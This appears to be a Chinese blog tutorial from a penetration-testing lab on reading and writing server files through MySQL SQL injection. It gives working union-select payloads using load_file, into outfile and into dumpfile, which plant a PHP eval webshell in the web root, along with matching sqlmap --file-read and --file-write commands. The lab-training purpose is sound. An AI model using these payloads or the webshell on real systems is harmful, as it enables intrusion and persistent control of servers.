SQL注入读写文件

最新推荐文章于 2024-05-24 08:55:45 发布
最新推荐文章于 2024-05-24 08:55:45 发布
阅读量1.8k 收藏 4
点赞数 3
分类专栏: WEB安全 文章标签: mysql 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LUOBIKUN/article/details/108790854
版权

SQL注入读写文件

前提

读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中:
数据库中通过(SHOW variables like ‘%secure%’;)命令查看配置。
1.secure_file_priv= 代表对文件读写没有限制
2.secure_file_priv=NULL 代表不能进行文件读写
3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进行读写
在这里插入图片描述

实现

读文件:

手工

load_file()
例如:

http://10.1.8.8/sql1/Less-1/?id=-1’union select 1,load_file(“C:\\phpStudy\\WWW\\ceshi.txt”),3  –+

例如,靶机上有一个ceshi.txt的文件:

在这里插入图片描述

成功读取文件内容:
在这里插入图片描述

sqlmap

–file-read

sqlmap -u http://10.1.8.8/sql1/Less-1/?id=1 –file-read “C:\phpStudy\WWW\ceshi.txt”

在这里插入图片描述

写文件:

手工

into outfile()

http://10.1.8.8/sql1/Less-1/?id=-1′ union select 1,”<?php eval($_POST[‘m’]);?>”,3   into outfile “C:\\phpStudy\\WWW\\ceshi.php” –+

在这里插入图片描述

虽然执行报错,但是文件是成功写入的:

在这里插入图片描述

靶机上已成功写入ceshi.php一句话:
在这里插入图片描述
在这里插入图片描述

into dumpfile()写二进制文件使用
同样也能成功写入:

http://10.1.8.8/sql1/Less-1/?id=-1′ union select 1,”<?php eval($_POST[‘m’]);?>”,3   into dumpfile “C:\\phpStudy\\WWW\\ceshi2.php” –+

在这里插入图片描述
在这里插入图片描述

Sqlmap

–file-write 本地文件 –file-dest 目的文件

sqlmap -u http://10.1.8.8/sql1/Less-1/?id=1   –file-write “C:\Users\CISP-PTE\Desktop\xie1.php” –file-dest “C:\phpStudy\WWW\xie.php”

操作机:
在这里插入图片描述

靶机上,文件已经写入:

在这里插入图片描述
在这里插入图片描述

当然,SQL注入写入webshell的方式还有其他的方法,这里列举的只是比较简单的方法,关键是,需要具体相应的权限,并且知道网站的绝对路径。

参考
https://www.cnblogs.com/insane-Mr-Li/p/10150165.html

Oriental r0se
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入——读写文件
cxrpty的博客
02-10 3402
读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中 1.secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进...
关于SQL注入文件读写的方法总结
09-09
主要给大家介绍了关于SQL注入文件读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
sql注入文件写入
一只菜鸟的博客
10-31 1822
sql注入中写入webshell的几种方式 secure_file_priv="c:/…"被注释掉或者是web路径 php.ini中的get_magic_quotes_gpc()函数未开启 其中secure_file_priv有三种情况 在进行写入websell时,要注意参数secure_file_priv是否有指定路径或者是否为null。最好要获得root权限 空,表示导入导出没有任何限制 有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件 nul
SQL注入中的文件读写操作:技术解析与防范策略
最新发布
weixin_43822401的博客
05-24 492
SQL注入攻击是网络世界中的一个严峻问题,它允许攻击者通过构造特殊的SQL语句来操纵数据库。在某些高级的SQL注入攻击中,攻击者不仅能获取数据,还能读取和写入服务器上的文件。本文将深入探讨SQL注入中的文件读写操作,提供详细的技术解析和实用的防范策略。SQL注入文件读写是指攻击者利用SQL注入漏洞,读取或写入服务器上的文件。这种攻击可以用于窃取敏感信息、上传恶意代码或实现持久化控制。
php怎么调用mysql语句添加数据_PHP如何通过SQL语句将数据写入MySQL数据库呢?
weixin_35965587的博客
01-19 111
1,php和MySQL建立连接关系2,打开3,接受页面数据,PHP录入到指定的表中1、2两步可直接使用一个数据库链接文件即可:conn.phpmysql_connect("localhost","root","");//连接MySQLmysql_select_db("hello");//选择数据库?>当然,前提是已经安装WEB服务器、PHP和MySQL,并且建立MySQL表“webjx”my...
SQL语句导入文本文件
龙傲天的博客
01-18 4126
SQL语句导入文本文件,实现插入功能 test101.txt 文本目录:(f:\test101.txt) 文本格式:(需要换行,每条数据单行) 15/lnn/11/12 16/lnn/11/12 17/lnn/11/12 18/lnn/11/12 19/lnn/11/12 20/lnn/11/12 21/lnn/11/12 插入命令: bu
【SequoiaDB巨杉数据库】File-read
demonsxxl的博客
04-07 62
语法 File.read( [size] ) 类别 File 描述 读取文本文件。 参数 参数名 参数类型 默认值 描述 是否必填 size int 默认读取当前文件游标之后的全部内容 读取的字节数 否 返回值 返回读取的文件内容。 错误 如果出错则抛异常,并输出错误信息,可以通过getLastErrMsg()获取错误信息或通过getLastError()获取错误码。 关于错误处理可以参考常见错误处理指南。 常见错误可参考错误码
sqlmap sql注入
08-22
4. **权限提升**:如果可能,SQLMap可以尝试获取数据库系统的完全控制权,例如,执行系统命令或读写文件。 5. **数据库操作**:SQLMap允许用户执行任意SQL查询,进行数据篡改、删除或添加新记录。 6. **隐蔽性**:...
Web安全SQL注入精讲视频.zip
04-16
2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入.mp4 2-4 报错注入.mp4 2-5 双注入.mp4 2-6 布尔盲注.mp4 2-7 时间盲注.mp4 2-8 Cookie注入.mp4 2-9 HTTP-Referer注入.mp4 3-1 ...
sql注入的思维导图。
04-19
* 高权限:可以读写文件、执行命令、注册表读取、获取shell等。 * 低权限:可以获取数据库记录信息、查询表、列、值等。 回显与盲注 SQL注入可以通过回显和盲注来获取数据库信息: * 回显:通过查询结果来获取...
三种数据库的 SQL 注入详解
08-03
读写文件 执行命令 攻击者对于程序注入,无论任何数据库,无非都是在做这三件事,只不过不同的数据库注入的 SQL 语句不一样罢了。 三种数据库的注入: Oracle 11g、MySQL 5.1 和 SQL Server 2008。 SQL ...
SQL注入文件写入和读取详解
weixin_30246221的博客
01-15 1357
文件读取使用load_file()函数: 使用之前我们需要先找到网站的绝对路径。(获取办法:报错显示、谷歌语法、site:目标网站 warning、遗留文件如phpinfo、漏洞爆出路径、读取配置文件) 注意路径符号:错误“\” 正确"\\" 正确"/"。如果将路径转换为16进制就可以不用引号。 举例: union select 1,load_file(“c:/inetpub/wwwr...
SQL注入速查表(上)
CC's Blog
08-27 5977
本文由Yinzo翻译,转载请保留署名。原文地址:http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#Enablecmdshell 文档版本:1.4 0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个
SQL注入写入文件方法(获取webshell)
Goodric的博客
04-08 2589
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
SQL注入:为什么拿不到os-shell?
无名J0kзr的博客
10-08 1756
文章目录权限问题--file-read--file-write和--file-dest--os-shell 权限问题 首先确保注入点的数据库连接用户有FILE权限 使用 --privileges查看 但是 就算有此权限也还有很多问题 SELINUX 因为我的服务器使用的并不是Apache的默认发布目录 所以我把SELINUX禁掉了 按理来说 SELINUX也会对这些操作有影响 没试 先留坑 fi...
File Read| file-read| 任意文件读取
薛定谔嘚喵博客
05-05 740
任意文件读取的危害往往大于目录遍历漏洞,任意文件读取不仅会泄露网站的结构目录,一些敏感文件还会被通过构造特殊的字符结构下载下来,比如说…任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。7、读取web应用日志文件,中间件的日志文件,其他程序的日志,系统日志等(可以网站后台地址、api接口、备份、等等敏感信息)
MySQL 全局配置 --secure-file-priv
热门推荐
zaihukeji的博客
08-20 2万+
一则问题 在执行导出INFORMATION_SCHEMA.OPTIMIZER_TRACE内容到本地文件时: SELECT TRACE INTO DUMPFILE "optimizer_trace.txt" FROM INFORMATION_SCHEMA.OPTIMIZER_TRACE; 报错提示如下: (1290, 'The MySQL server is running with the --secure-file-priv option so it cannot execute this..
渗透测试-SQL注入-文件读写及木马植入
fjc0214的博客
12-08 496
因为我们不知道可写文件夹和可写路径,所以这个漏洞能利用的可能性很小。这是在我们自己搭建的环境中测试这个漏洞,我们先确定文件读写权限,然后再进行文件读写。真实环境中,我们需要爆破出可读写文件路径。
sql注入 文件读写
09-23
文件读取是SQL注入的一种常见技巧之一。攻击者可以使用`load_file()`函数来读取服务器上的文件。通过构造合适的SQL注入语句,攻击者可以在查询中使用`load_file()`函数来读取指定路径上的文件内容。但是,为了成功...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值